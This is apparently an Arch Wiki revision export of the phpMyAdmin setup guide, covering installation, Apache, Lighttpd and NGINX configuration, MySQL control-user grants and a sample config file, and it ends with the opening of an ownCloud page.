Now that the basic database server has been setup, it ''is'' functional, however by default, extra options such as table linking, change tracking, PDF creation, and bookmarking queries are disabled. You will see a message at the bottom of the main phpMyAdmin page, "The phpMyAdmin configuration storage is not completely configured, some extended features have been deactivated. To find out why...", This section addresses how to to enable these extra features.<br />
<br />
{{note|This example assumes you want to use the username '''pma''' as the controluser, and '''pmapass''' as the controlpass. These should be changed (the ''very'' least, you should change the password!) to something more secure.}}<br />
<br />
In {{ic|/etc/webapps/phpmyadmin/config.inc.php}}, uncomment (remove the leading "//"s on) these two lines, and change them to your desired credentials:<br />
{{bc|1=<br />
// $cfg['Servers'][$i]['controluser'] = 'pma';<br />
// $cfg['Servers'][$i]['controlpass'] = 'pmapass';<br />
}}<br />
You will need this information later, so keep it in mind.<br />
<br />
Beneath the controluser setup section, uncomment these lines:<br />
{{bc|1=<br />
/* Storage database and tables */<br />
// $cfg['Servers'][$i]['pmadb'] = 'phpmyadmin';<br />
// $cfg['Servers'][$i]['bookmarktable'] = 'pma_bookmark';<br />
// $cfg['Servers'][$i]['relation'] = 'pma_relation';<br />
// $cfg['Servers'][$i]['table_info'] = 'pma_table_info';<br />
// $cfg['Servers'][$i]['table_coords'] = 'pma_table_coords';<br />
// $cfg['Servers'][$i]['pdf_pages'] = 'pma_pdf_pages';<br />
// $cfg['Servers'][$i]['column_info'] = 'pma_column_info';<br />
// $cfg['Servers'][$i]['history'] = 'pma_history';<br />
// $cfg['Servers'][$i]['tracking'] = 'pma_tracking';<br />
// $cfg['Servers'][$i]['designer_coords'] = 'pma_designer_coords';<br />
// $cfg['Servers'][$i]['userconfig'] = 'pma_userconfig';<br />
// $cfg['Servers'][$i]['recent'] = 'pma_recent';<br />
}}<br />
<br />
Next, create the user with the above details. Don't set any permissions for it just yet.<br />
{{note|If you can't login to phpmyadmin, make sure that your mysql server is started.}}<br />
<br />
<br />
===== creating phpMyAdmin database =====<br />
Using the phpMyAdmin web interface:<br />
Import {{ic|/usr/share/webapps/phpMyAdmin/examples/create_tables.sql}} from phpMyAdmin -> Import.<br />
'''or'''<br />
Using command line:<br />
{{ic|mysql -uroot -p < /usr/share/webapps/phpMyAdmin/examples/create_tables.sql }}<br />
<br />
===== creating phpMyAdmin database user =====<br />
Now to apply the permissions to your controluser, in the SQL tab, make sure to replace all instances of 'pma' and 'pmapass' to the values set in config.inc.php. If you are setting this up for a remote database, then you must also change 'localhost' to the proper host:<br />
{{bc|<br />
GRANT USAGE ON mysql.* TO 'pma'@'localhost' IDENTIFIED BY 'pmapass';<br />
GRANT SELECT (<br />
Host, User, Select_priv, Insert_priv, Update_priv, Delete_priv,<br />
Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv,<br />
File_priv, Grant_priv, References_priv, Index_priv, Alter_priv,<br />
Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv,<br />
Execute_priv, Repl_slave_priv, Repl_client_priv<br />
) ON mysql.user TO 'pma'@'localhost';<br />
GRANT SELECT ON mysql.db TO 'pma'@'localhost';<br />
GRANT SELECT ON mysql.host TO 'pma'@'localhost';<br />
GRANT SELECT (Host, Db, User, Table_name, Table_priv, Column_priv)<br />
ON mysql.tables_priv TO 'pma'@'localhost';<br />
}}<br />
<br />
In order to take advantage of the bookmark and relation features, you will also need to give '''pma''' some additional permissions:<br />
{{Note|as long as you did not change the value of '''$cfg['Servers'][$i]['pmadb']''' in {{ic|/etc/webapps/phpmyadmin/config.inc.php}}, then '''<pma_db>''' should be '''phpmyadmin'''}}<br />
{{bc|GRANT SELECT, INSERT, UPDATE, DELETE ON <pma_db>.* TO 'pma'@'localhost';}}<br />
<br />
Log out, and back in to ensure the new features are activated. The message at the bottom of the main screen should now be gone.<br />
<br />
==Accessing your phpMyAdmin installation==<br />
Finally your phpmyadmin installation is complete. Before you start using it you need to [[Daemons#Restarting|restart]] httpd (Apache)<br />
<br />
You can access your phpmyadmin installation using the following url:<br />
<br />
{{bc|<br />
http://localhost/phpmyadmin/<br />
or<br />
http://localhost/phpmyadmin/index.php<br />
}}<br />
<br />
Note: 'localhost' is the hostname in your /etc/rc.conf file.<br />
<br />
If you want to access it using:<br />
<br />
{{bc|<br />
http://localhost/phpmyadmin<br />
}}<br />
<br />
in '/etc/httpd/conf/extra/httpd-phpmyadmin.conf' change:<br />
<br />
{{bc|<br />
Alias /phpmyadmin/ "/usr/share/webapps/phpMyAdmin/"<br />
}}<br />
<br />
to<br />
<br />
{{bc|<br />
Alias /phpmyadmin "/usr/share/webapps/phpMyAdmin"<br />
}}<br />
<br />
You should also read [http://bbs.archlinux.org/viewtopic.php?pid=632500 this thread].<br />
<br />
If you get the error "#2002 - The server is not responding (or the local MySQL server's socket is not correctly configured)" then you might want to change "localhost" in /etc/webapps/phpmyadmin/config.inc.php on this line:<br />
<br />
{{bc|1=<br />
$cfg['Servers'][$i]['host'] = 'localhost';<br />
}}<br />
<br />
to your hostname specified in /etc/hosts and /etc/rc.conf under HOSTNAME.<br />
<br />
If you would like to use phpmyadmin setup script by calling http://localhost/phpmyadmin/setup you will need to create a config directory that's writeable by the httpd in the /usr/share/webapps/phpmyadmin as follows:<br />
<br />
{{bc|<br />
cd /usr/share/webapps/phpMyAdmin<br />
mkdir config<br />
chgrp http config<br />
chmod g+w config<br />
}}<br />
<br />
==Lighttpd Configuration==<br />
The php setup for lighttpd is exactly the same as for apache.<br />
Make an alias for phpmyadmin in your lighttpd config.<br />
alias.url = ( "/phpmyadmin" => "/usr/share/webapps/phpMyAdmin/")<br />
Then enable mod_alias, mod_fastcgi and mod_cgi in your config ( server.modules section )<br />
<br />
Update open_basedir in /etc/php/php.ini and add "/usr/share/webapps/".<br />
open_basedir = /srv/http/:/home/:/tmp/:/usr/share/pear/:/usr/share/webapps/:/etc/webapps/<br />
<br />
Make sure lighttpd is setup to serve php files, [[Lighttpd]]<br />
<br />
Restart lighttpd and browse to http://localhost/phpmyadmin/index.php<br />
<br />
==NGINX Configuration==<br />
Also similar to apache configuration (and Lighttpd, for that matter).<br />
<br />
Create a symbolic link to the /usr/share/webapps/phpmyadmin directory from whichever directory your vhost is serving files from, e.g. /srv/http/<domain>/public_html/<br />
<br />
sudo ln -s /usr/share/webapps/phpMyAdmin /srv/http/<domain>/public_html/phpmyadmin<br />
<br />
You can also setup a sub domain with a server block like so (if using php-fpm):<br />
<br />
server {<br />
server_name phpmyadmin.<domain.tld>;<br />
access_log /srv/http/<domain>/logs/phpmyadmin.access.log;<br />
error_log /srv/http/<domain.tld>/logs/phpmyadmin.error.log;<br />
<br />
location / {<br />
root /srv/http/<domain.tld>/public_html/phpmyadmin;<br />
index index.html index.htm index.php;<br />
}<br />
<br />
location ~ \.php$ {<br />
root /srv/http/<domain.tld>/public_html/phpmyadmin;<br />
fastcgi_pass unix:/var/run/php-fpm/php-fpm.sock;<br />
fastcgi_index index.php;<br />
fastcgi_param SCRIPT_FILENAME /srv/http/<domain.tld>/public_html/phpmyadmin/$fastcgi_script_name;<br />
include fastcgi_params;<br />
}<br />
}<br />
<br />
Update open_basedir in /etc/php/php.ini and add "/usr/share/webapps/".<br />
open_basedir = /srv/http/:/home/:/tmp/:/usr/share/pear/:/usr/share/webapps/:/etc/webapps/<br />
<br />
You may run into some issues with phpmyadmin telling you "The Configuration File Now Needs A Secret Passphrase" and no matter what you enter, the error is still displayed. Try changing the ownership of the files to the NGINX specified user/group, e.g. nginx...<br />
<br />
sudo chown -R http:http /usr/share/webapps/phpMyAdmin<br />
<br />
If the above doesn't fix it try adding the following to your NGINX Configuration below the other fastcgi_param (I think its something to do with the Suhosin-Patch)<br />
<br />
fastcgi_param PHP_ADMIN_VALUE open_basedir="/srv/:/tmp/:/usr/share/webapps/:/etc/webapps:/usr/share/pear/";<br />
<br />
While you can enter anything for the blowfish password, you may want to choose a randomly generated string of characters (most likely for security reasons). Here's a handy tool that will do that for you on the web[http://www.question-defense.com/tools/phpmyadmin-blowfish-secret-generator].<br />
<br />
When using SSL, you might run into the problem that the links on the pages generated by phpMyAdmin incorrectly start with "http" instead of "https" which may cause errors. To fix this, you can add the following fcgi_param to your SSL-enabled server section (in addition to your usual fastcgi params):<br />
<br />
fastcgi_param HTTPS on;<br />
<br />
==Other (Older) information==<br />
<br />
This page holds a sample 'config.inc.php' file that you can place in the main phpMyAdmin directory so that it immediately starts working<br />
<br />
'''Things you should do first'''<br />
<br />
Create a 'controluser', so that phpmyadmin can read from the main mysql database.<br />
<br />
{{bc|mysql -u root -pYOURROOTPASSWORD<br />
mysql> grant usage on mysql.* to controluser@localhost identified by 'CONTROLPASS';<br />
}}<br />
<br />
'''Where is phpmyadmin'''<br />
<br />
in phpmyadmin 3.2.2-3 the file is missing /srv/http/ create this symlik<br />
<br />
{{bc|ln -s /usr/share/webapps/phpMyAdmin/ /srv/http/phpmyadmin<br />
}}<br />
<br />
'''Things you should change'''<br />
<br />
controluser is set to controluser <br><br />
controlpass is set to password <br><br />
verbose is set to name_of_server<br />
<br />
'''Sample 'config.inc.php' file'''<br />
{{bc|1=<br />
<?php<br />
/*<br />
* Generated configuration file<br />
* Generated by: phpMyAdmin 2.11.8.1 setup script by Michal Čihař <michal@cihar.com><br />
* Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $<br />
* Date: Mon, 01 Sep 2008 20:34:02 GMT<br />
*/<br />
<br />
/* Servers configuration */<br />
$i = 0;<br />
<br />
/* Server ravi-test-mysql (http) [1] */<br />
$i++;<br />
$cfg['Servers'][$i]['host'] = 'localhost';<br />
$cfg['Servers'][$i]['extension'] = 'mysql';<br />
$cfg['Servers'][$i]['port'] = '3306';<br />
$cfg['Servers'][$i]['connect_type'] = 'tcp';<br />
$cfg['Servers'][$i]['compress'] = false;<br />
$cfg['Servers'][$i]['controluser'] = 'controluser';<br />
$cfg['Servers'][$i]['controlpass'] = 'password';<br />
$cfg['Servers'][$i]['auth_type'] = 'http';<br />
$cfg['Servers'][$i]['verbose'] = 'name_of_server';<br />
<br />
/* End of servers configuration */<br />
<br />
$cfg['LeftFrameLight'] = true;<br />
$cfg['LeftFrameDBTree'] = true;<br />
$cfg['LeftFrameDBSeparator'] = '_';<br />
$cfg['LeftFrameTableSeparator'] = '__';<br />
$cfg['LeftFrameTableLevel'] = 1;<br />
$cfg['LeftDisplayLogo'] = true;<br />
$cfg['LeftDisplayServers'] = false;<br />
$cfg['DisplayServersList'] = false;<br />
$cfg['DisplayDatabasesList'] = 'auto';<br />
$cfg['LeftPointerEnable'] = true;<br />
$cfg['DefaultTabServer'] = 'main.php';<br />
$cfg['DefaultTabDatabase'] = 'db_structure.php';<br />
$cfg['DefaultTabTable'] = 'tbl_structure.php';<br />
$cfg['LightTabs'] = false;<br />
$cfg['ErrorIconic'] = true;<br />
$cfg['MainPageIconic'] = true;<br />
$cfg['ReplaceHelpImg'] = true;<br />
$cfg['NavigationBarIconic'] = 'both';<br />
$cfg['PropertiesIconic'] = 'both';<br />
$cfg['BrowsePointerEnable'] = true;<br />
$cfg['BrowseMarkerEnable'] = true;<br />
$cfg['ModifyDeleteAtRight'] = false;<br />
$cfg['ModifyDeleteAtLeft'] = true;<br />
$cfg['RepeatCells'] = 100;<br />
$cfg['DefaultDisplay'] = 'horizontal';<br />
$cfg['TextareaCols'] = 40;<br />
$cfg['TextareaRows'] = 7;<br />
$cfg['LongtextDoubleTextarea'] = true;<br />
$cfg['TextareaAutoSelect'] = false;<br />
$cfg['CharEditing'] = 'input';<br />
$cfg['CharTextareaCols'] = 40;<br />
$cfg['CharTextareaRows'] = 2;<br />
$cfg['CtrlArrowsMoving'] = true;<br />
$cfg['DefaultPropDisplay'] = 'horizontal';<br />
$cfg['InsertRows'] = 2;<br />
$cfg['EditInWindow'] = true;<br />
$cfg['QueryWindowHeight'] = 310;<br />
$cfg['QueryWindowWidth'] = 550;<br />
$cfg['QueryWindowDefTab'] = 'sql';<br />
$cfg['ForceSSL'] = false;<br />
$cfg['ShowPhpInfo'] = false;<br />
$cfg['ShowChgPassword'] = false;<br />
$cfg['AllowArbitraryServer'] = false;<br />
$cfg['LoginCookieRecall'] = 'something';<br />
$cfg['LoginCookieValidity'] = 1800;<br />
?><br />
}}</div>Wakehttps://wiki.archlinux.org/index.php?title=PhpMyAdmin&diff=234756PhpMyAdmin2012-11-10T21:43:48Z<p>Wake: /* Review apache phpmyadmin configuration */ rm rc.d stuff</p>
<hr />
<div>[[Category:Web Server]]<br />
{{lowercase title}}<br />
[[cs:PhpMyAdmin]]<br />
[[es:PhpMyAdmin]]<br />
[[fr:phpmyadmin]]<br />
[[ru:PhpMyAdmin]]<br />
[[tr:PhpMyAdmin]]<br />
[[zh-CN:PhpMyAdmin]]<br />
==Pre-Installation==<br />
See [[LAMP]] for a guide to setting up Apache, MySQL, and PHP.<br />
<br />
==Installation==<br />
To install [http://www.phpmyadmin.net/ phpMyAdmin], install the ''phpmyadmin'' and ''php-mcrypt'' packages with<br />
{{bc|<br />
pacman -S phpmyadmin php-mcrypt<br />
}}<br />
<br />
== Configuration ==<br />
Ensure you do not have an older copy of phpMyAdmin.<br />
{{bc|<br />
rm -r /srv/http/phpMyAdmin<br />
}}<br />
<br />
Copy the example configuration file to your httpd configuration directory.<br />
{{bc|<br />
cp /etc/webapps/phpmyadmin/apache.example.conf /etc/httpd/conf/extra/httpd-phpmyadmin.conf<br />
}}<br />
<br />
Add the following lines to {{ic|/etc/httpd/conf/httpd.conf}}:<br />
{{bc|<br />
# phpMyAdmin configuration<br />
Include conf/extra/httpd-phpmyadmin.conf<br />
}}<br />
<br />
You can type this into the terminal to produce the same effect:<br />
{{bc|<br />
echo -e "\nInclude conf/extra/httpd-phpmyadmin.conf" >> /etc/httpd/conf/httpd.conf<br />
}}<br />
<br />
=== Enable php handling in Apache ===<br />
<br />
Add the following lines to {{ic|/etc/httpd/conf/httpd.conf}}:<br />
{{bc|<br />
# Use for PHP 5.x:<br />
LoadModule php5_module modules/libphp5.so<br />
AddHandler php5-script php<br />
}}<br />
<br />
Add index.php after "DirectoryIndex index.html"<br />
{{bc|<br />
# DirectoryIndex: sets the file that Apache will serve if a directory<br />
# is requested.<br />
#<br />
<IfModule dir_module><br />
DirectoryIndex index.html index.php<br />
</IfModule><br />
}}<br />
<br />
=== Adjust access rights ===<br />
<br />
In {{ic|/etc/webapps/phpmyadmin/.htaccess}}, comment out ''deny from all''. The line should look like this:<br />
#deny from all<br />
<br />
Alternatively, you can restrict access to localhost and your local network only. Replace ''192.168.1.0/24'' with your network's IP block.<br />
deny from all<br />
allow from localhost<br />
allow from 192.168.1.0/24<br />
<br />
The lines above are not enough if you use ipv6 in {{ic|/etc/hosts}}. If so, add one more line to {{ic|/etc/webapps/phpmyadmin/.htaccess}}:<br />
allow from ::1<br />
<br />
Otherwise you'll get an error similar to "Error 403 - Access forbidden!" when you attempt to access your phpMyAdmin installation.<br />
<br />
=== Review apache phpmyadmin configuration ===<br />
<br />
Your {{ic|/etc/httpd/conf/extra/httpd-phpmyadmin.conf}} should have the following information:<br />
{{bc|<br />
Alias /phpmyadmin "/usr/share/webapps/phpMyAdmin"<br />
<Directory "/usr/share/webapps/phpMyAdmin"><br />
AllowOverride All<br />
Options FollowSymlinks<br />
Order allow,deny<br />
Allow from all<br />
php_admin_value open_basedir "/srv/:/tmp/:/usr/share/webapps/:/etc/webapps:/usr/share/pear/"<br />
</Directory><br />
}}<br />
<br />
You need the mcrypt (if you want phpmyadmin internal authentication) and mysql modules, so uncomment the following in {{ic|/etc/php/php.ini}}:<br />
extension=mcrypt.so<br />
extension=mysql.so<br />
extension=mysqli.so (optional)<br />
<br />
and [[Daemons#Restarting|restart]] httpd (Apache).<br />
<br />
=== Add blowfish_secret passphrase ===<br />
If you see the following error message at the bottom of the page when you first log in to /phpmyadmin (using a previously setup MySQL username and password) :<br />
<br />
ERROR: The configuration file now needs a secret passphrase (blowfish_secret)<br />
<br />
You need to add a blowfish password to the phpMyAdmin's config file. Edit {{ic|/etc/webapps/phpmyadmin/config.inc.php}} and insert a random blowfish "password" in the line <br />
<br />
$cfg['blowfish_secret'] = ''; /* YOU MUST FILL IN THIS FOR COOKIE AUTH! */<br />
<br />
Go [http://www.question-defense.com/tools/phpmyadmin-blowfish-secret-generator here] to get a nicely generated blowfish_secret and paste it between the '' marks. It should now look something like this:<br />
<br />
$cfg['blowfish_secret'] = 'qtdRoGmbc9{8IZr323xYcSN]0s)r$9b_JUnb{~Xz'; /* YOU MUST FILL IN THIS FOR COOKIE AUTH! */<br />
<br />
The error should go away if you refresh the phpmyadmin page.<br />
<br />
=== Enabling Configuration Storage (optional) ===<br />
Now that the basic database server has been setup, it ''is'' functional, however by default, extra options such as table linking, change tracking, PDF creation, and bookmarking queries are disabled. You will see a message at the bottom of the main phpMyAdmin page, "The phpMyAdmin configuration storage is not completely configured, some extended features have been deactivated. To find out why...", This section addresses how to to enable these extra features.<br />
<br />
{{note|This example assumes you want to use the username '''pma''' as the controluser, and '''pmapass''' as the controlpass. These should be changed (the ''very'' least, you should change the password!) to something more secure.}}<br />
<br />
In {{ic|/etc/webapps/phpmyadmin/config.inc.php}}, uncomment (remove the leading "//"s on) these two lines, and change them to your desired credentials:<br />
{{bc|1=<br />
// $cfg['Servers'][$i]['controluser'] = 'pma';<br />
// $cfg['Servers'][$i]['controlpass'] = 'pmapass';<br />
}}<br />
You will need this information later, so keep it in mind.<br />
<br />
Beneath the controluser setup section, uncomment these lines:<br />
{{bc|1=<br />
/* Storage database and tables */<br />
// $cfg['Servers'][$i]['pmadb'] = 'phpmyadmin';<br />
// $cfg['Servers'][$i]['bookmarktable'] = 'pma_bookmark';<br />
// $cfg['Servers'][$i]['relation'] = 'pma_relation';<br />
// $cfg['Servers'][$i]['table_info'] = 'pma_table_info';<br />
// $cfg['Servers'][$i]['table_coords'] = 'pma_table_coords';<br />
// $cfg['Servers'][$i]['pdf_pages'] = 'pma_pdf_pages';<br />
// $cfg['Servers'][$i]['column_info'] = 'pma_column_info';<br />
// $cfg['Servers'][$i]['history'] = 'pma_history';<br />
// $cfg['Servers'][$i]['tracking'] = 'pma_tracking';<br />
// $cfg['Servers'][$i]['designer_coords'] = 'pma_designer_coords';<br />
// $cfg['Servers'][$i]['userconfig'] = 'pma_userconfig';<br />
// $cfg['Servers'][$i]['recent'] = 'pma_recent';<br />
}}<br />
<br />
Next, create the user with the above details. Don't set any permissions for it just yet.<br />
{{note|If you can't login to phpmyadmin, make sure that your mysql server is started.}}<br />
<br />
<br />
===== creating phpMyAdmin database =====<br />
Using the phpMyAdmin web interface:<br />
Import {{ic|/usr/share/webapps/phpMyAdmin/examples/create_tables.sql}} from phpMyAdmin -> Import.<br />
'''or'''<br />
Using command line:<br />
{{ic|mysql -uroot -p < /usr/share/webapps/phpMyAdmin/examples/create_tables.sql }}<br />
<br />
===== creating phpMyAdmin database user =====<br />
Now to apply the permissions to your controluser, in the SQL tab, make sure to replace all instances of 'pma' and 'pmapass' to the values set in config.inc.php. If you are setting this up for a remote database, then you must also change 'localhost' to the proper host:<br />
{{bc|<br />
GRANT USAGE ON mysql.* TO 'pma'@'localhost' IDENTIFIED BY 'pmapass';<br />
GRANT SELECT (<br />
Host, User, Select_priv, Insert_priv, Update_priv, Delete_priv,<br />
Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv,<br />
File_priv, Grant_priv, References_priv, Index_priv, Alter_priv,<br />
Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv,<br />
Execute_priv, Repl_slave_priv, Repl_client_priv<br />
) ON mysql.user TO 'pma'@'localhost';<br />
GRANT SELECT ON mysql.db TO 'pma'@'localhost';<br />
GRANT SELECT ON mysql.host TO 'pma'@'localhost';<br />
GRANT SELECT (Host, Db, User, Table_name, Table_priv, Column_priv)<br />
ON mysql.tables_priv TO 'pma'@'localhost';<br />
}}<br />
<br />
In order to take advantage of the bookmark and relation features, you will also need to give '''pma''' some additional permissions:<br />
{{Note|as long as you did not change the value of '''$cfg['Servers'][$i]['pmadb']''' in {{ic|/etc/webapps/phpmyadmin/config.inc.php}}, then '''<pma_db>''' should be '''phpmyadmin'''}}<br />
{{bc|GRANT SELECT, INSERT, UPDATE, DELETE ON <pma_db>.* TO 'pma'@'localhost';}}<br />
<br />
Log out, and back in to ensure the new features are activated. The message at the bottom of the main screen should now be gone.<br />
<br />
==Accessing your phpMyAdmin installation==<br />
Finally your phpmyadmin installation is complete. Before you start using it you need to restart your apache server by following command:<br />
<br />
{{bc|<br />
# rc.d restart httpd<br />
}}<br />
<br />
You can access your phpmyadmin installation using the following url:<br />
<br />
{{bc|<br />
http://localhost/phpmyadmin/<br />
or<br />
http://localhost/phpmyadmin/index.php<br />
}}<br />
<br />
Note: 'localhost' is the hostname in your /etc/rc.conf file.<br />
<br />
If you want to access it using:<br />
<br />
{{bc|<br />
http://localhost/phpmyadmin<br />
}}<br />
<br />
in '/etc/httpd/conf/extra/httpd-phpmyadmin.conf' change:<br />
<br />
{{bc|<br />
Alias /phpmyadmin/ "/usr/share/webapps/phpMyAdmin/"<br />
}}<br />
<br />
to<br />
<br />
{{bc|<br />
Alias /phpmyadmin "/usr/share/webapps/phpMyAdmin"<br />
}}<br />
<br />
You should also read [http://bbs.archlinux.org/viewtopic.php?pid=632500 this thread].<br />
<br />
If you get the error "#2002 - The server is not responding (or the local MySQL server's socket is not correctly configured)" then you might want to change "localhost" in /etc/webapps/phpmyadmin/config.inc.php on this line:<br />
<br />
{{bc|1=<br />
$cfg['Servers'][$i]['host'] = 'localhost';<br />
}}<br />
<br />
to your hostname specified in /etc/hosts and /etc/rc.conf under HOSTNAME.<br />
<br />
If you would like to use phpmyadmin setup script by calling http://localhost/phpmyadmin/setup you will need to create a config directory that's writeable by the httpd in the /usr/share/webapps/phpmyadmin as follows:<br />
<br />
{{bc|<br />
cd /usr/share/webapps/phpMyAdmin<br />
sudo mkdir config<br />
sudo chgrp http config<br />
sudo chmod g+w config<br />
}}<br />
<br />
==Lighttpd Configuration==<br />
The php setup for lighttpd is exactly the same as for apache.<br />
Make an alias for phpmyadmin in your lighttpd config.<br />
alias.url = ( "/phpmyadmin" => "/usr/share/webapps/phpMyAdmin/")<br />
Then enable mod_alias, mod_fastcgi and mod_cgi in your config ( server.modules section )<br />
<br />
Update open_basedir in /etc/php/php.ini and add "/usr/share/webapps/".<br />
open_basedir = /srv/http/:/home/:/tmp/:/usr/share/pear/:/usr/share/webapps/:/etc/webapps/<br />
<br />
Make sure lighttpd is setup to serve php files, [[Lighttpd]]<br />
<br />
Restart lighttpd and browse to http://localhost/phpmyadmin/index.php<br />
<br />
==NGINX Configuration==<br />
Also similar to apache configuration (and Lighttpd, for that matter).<br />
<br />
Create a symbolic link to the /usr/share/webapps/phpmyadmin directory from whichever directory your vhost is serving files from, e.g. /srv/http/<domain>/public_html/<br />
<br />
sudo ln -s /usr/share/webapps/phpMyAdmin /srv/http/<domain>/public_html/phpmyadmin<br />
<br />
You can also setup a sub domain with a server block like so (if using php-fpm):<br />
<br />
server {<br />
server_name phpmyadmin.<domain.tld>;<br />
access_log /srv/http/<domain>/logs/phpmyadmin.access.log;<br />
error_log /srv/http/<domain.tld>/logs/phpmyadmin.error.log;<br />
<br />
location / {<br />
root /srv/http/<domain.tld>/public_html/phpmyadmin;<br />
index index.html index.htm index.php;<br />
}<br />
<br />
location ~ \.php$ {<br />
root /srv/http/<domain.tld>/public_html/phpmyadmin;<br />
fastcgi_pass unix:/var/run/php-fpm/php-fpm.sock;<br />
fastcgi_index index.php;<br />
fastcgi_param SCRIPT_FILENAME /srv/http/<domain.tld>/public_html/phpmyadmin/$fastcgi_script_name;<br />
include fastcgi_params;<br />
}<br />
}<br />
<br />
Update open_basedir in /etc/php/php.ini and add "/usr/share/webapps/".<br />
open_basedir = /srv/http/:/home/:/tmp/:/usr/share/pear/:/usr/share/webapps/:/etc/webapps/<br />
<br />
You may run into some issues with phpmyadmin telling you "The Configuration File Now Needs A Secret Passphrase" and no matter what you enter, the error is still displayed. Try changing the ownership of the files to the NGINX specified user/group, e.g. nginx...<br />
<br />
sudo chown -R http:http /usr/share/webapps/phpMyAdmin<br />
<br />
If the above doesn't fix it try adding the following to your NGINX Configuration below the other fastcgi_param (I think its something to do with the Suhosin-Patch)<br />
<br />
fastcgi_param PHP_ADMIN_VALUE open_basedir="/srv/:/tmp/:/usr/share/webapps/:/etc/webapps:/usr/share/pear/";<br />
<br />
While you can enter anything for the blowfish password, you may want to choose a randomly generated string of characters (most likely for security reasons). Here's a handy tool that will do that for you on the web[http://www.question-defense.com/tools/phpmyadmin-blowfish-secret-generator].<br />
<br />
When using SSL, you might run into the problem that the links on the pages generated by phpMyAdmin incorrectly start with "http" instead of "https" which may cause errors. To fix this, you can add the following fcgi_param to your SSL-enabled server section (in addition to your usual fastcgi params):<br />
<br />
fastcgi_param HTTPS on;<br />
<br />
==Other (Older) information==<br />
<br />
This page holds a sample 'config.inc.php' file that you can place in the main phpMyAdmin directory so that it immediately starts working<br />
<br />
'''Things you should do first'''<br />
<br />
Create a 'controluser', so that phpmyadmin can read from the main mysql database.<br />
<br />
{{bc|mysql -u root -pYOURROOTPASSWORD<br />
mysql> grant usage on mysql.* to controluser@localhost identified by 'CONTROLPASS';<br />
}}<br />
<br />
'''Where is phpmyadmin'''<br />
<br />
in phpmyadmin 3.2.2-3 the file is missing /srv/http/ create this symlik<br />
<br />
{{bc|ln -s /usr/share/webapps/phpMyAdmin/ /srv/http/phpmyadmin<br />
}}<br />
<br />
'''Things you should change'''<br />
<br />
controluser is set to controluser <br><br />
controlpass is set to password <br><br />
verbose is set to name_of_server<br />
<br />
'''Sample 'config.inc.php' file'''<br />
{{bc|1=<br />
<?php<br />
/*<br />
* Generated configuration file<br />
* Generated by: phpMyAdmin 2.11.8.1 setup script by Michal Čihař <michal@cihar.com><br />
* Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $<br />
* Date: Mon, 01 Sep 2008 20:34:02 GMT<br />
*/<br />
<br />
/* Servers configuration */<br />
$i = 0;<br />
<br />
/* Server ravi-test-mysql (http) [1] */<br />
$i++;<br />
$cfg['Servers'][$i]['host'] = 'localhost';<br />
$cfg['Servers'][$i]['extension'] = 'mysql';<br />
$cfg['Servers'][$i]['port'] = '3306';<br />
$cfg['Servers'][$i]['connect_type'] = 'tcp';<br />
$cfg['Servers'][$i]['compress'] = false;<br />
$cfg['Servers'][$i]['controluser'] = 'controluser';<br />
$cfg['Servers'][$i]['controlpass'] = 'password';<br />
$cfg['Servers'][$i]['auth_type'] = 'http';<br />
$cfg['Servers'][$i]['verbose'] = 'name_of_server';<br />
<br />
/* End of servers configuration */<br />
<br />
$cfg['LeftFrameLight'] = true;<br />
$cfg['LeftFrameDBTree'] = true;<br />
$cfg['LeftFrameDBSeparator'] = '_';<br />
$cfg['LeftFrameTableSeparator'] = '__';<br />
$cfg['LeftFrameTableLevel'] = 1;<br />
$cfg['LeftDisplayLogo'] = true;<br />
$cfg['LeftDisplayServers'] = false;<br />
$cfg['DisplayServersList'] = false;<br />
$cfg['DisplayDatabasesList'] = 'auto';<br />
$cfg['LeftPointerEnable'] = true;<br />
$cfg['DefaultTabServer'] = 'main.php';<br />
$cfg['DefaultTabDatabase'] = 'db_structure.php';<br />
$cfg['DefaultTabTable'] = 'tbl_structure.php';<br />
$cfg['LightTabs'] = false;<br />
$cfg['ErrorIconic'] = true;<br />
$cfg['MainPageIconic'] = true;<br />
$cfg['ReplaceHelpImg'] = true;<br />
$cfg['NavigationBarIconic'] = 'both';<br />
$cfg['PropertiesIconic'] = 'both';<br />
$cfg['BrowsePointerEnable'] = true;<br />
$cfg['BrowseMarkerEnable'] = true;<br />
$cfg['ModifyDeleteAtRight'] = false;<br />
$cfg['ModifyDeleteAtLeft'] = true;<br />
$cfg['RepeatCells'] = 100;<br />
$cfg['DefaultDisplay'] = 'horizontal';<br />
$cfg['TextareaCols'] = 40;<br />
$cfg['TextareaRows'] = 7;<br />
$cfg['LongtextDoubleTextarea'] = true;<br />
$cfg['TextareaAutoSelect'] = false;<br />
$cfg['CharEditing'] = 'input';<br />
$cfg['CharTextareaCols'] = 40;<br />
$cfg['CharTextareaRows'] = 2;<br />
$cfg['CtrlArrowsMoving'] = true;<br />
$cfg['DefaultPropDisplay'] = 'horizontal';<br />
$cfg['InsertRows'] = 2;<br />
$cfg['EditInWindow'] = true;<br />
$cfg['QueryWindowHeight'] = 310;<br />
$cfg['QueryWindowWidth'] = 550;<br />
$cfg['QueryWindowDefTab'] = 'sql';<br />
$cfg['ForceSSL'] = false;<br />
$cfg['ShowPhpInfo'] = false;<br />
$cfg['ShowChgPassword'] = false;<br />
$cfg['AllowArbitraryServer'] = false;<br />
$cfg['LoginCookieRecall'] = 'something';<br />
$cfg['LoginCookieValidity'] = 1800;<br />
?><br />
}}</div>Wakehttps://wiki.archlinux.org/index.php?title=Nextcloud&diff=234755Nextcloud2012-11-10T21:41:33Z<p>Wake: /* Installation */ rm rc.d stuff</p>
<hr />
<div>[[Category:Web Server]]<br />
[[fr:Owncloud]]<br />
[http://en.wikipedia.org/wiki/OwnCloud ownCloud] is a software suite that provides a location-independent storage area for data (cloud storage).<br />
<br />
== Installation ==<br />
{{AUR|owncloud}} is available in the [[AUR]]. <br />
#First of all set up the [[LAMP]] stack as described in the corresponding Wiki article. <br />
#Install the {{AUR|owncloud}} package as described in [[AUR#Installing_packages]].<br />
#Add the following lines into '''/etc/httpd/conf/httpd.conf''' (php5 should have been configured during the LAMP stack setup):<br />
Include /etc/httpd/conf/extra/owncloud.conf<br />
LoadModule php5_module modules/libphp5.so<br />
Include conf/extra/php5_module.conf<br />
Uncomment extensions in '''/etc/php/php.ini'''<br />
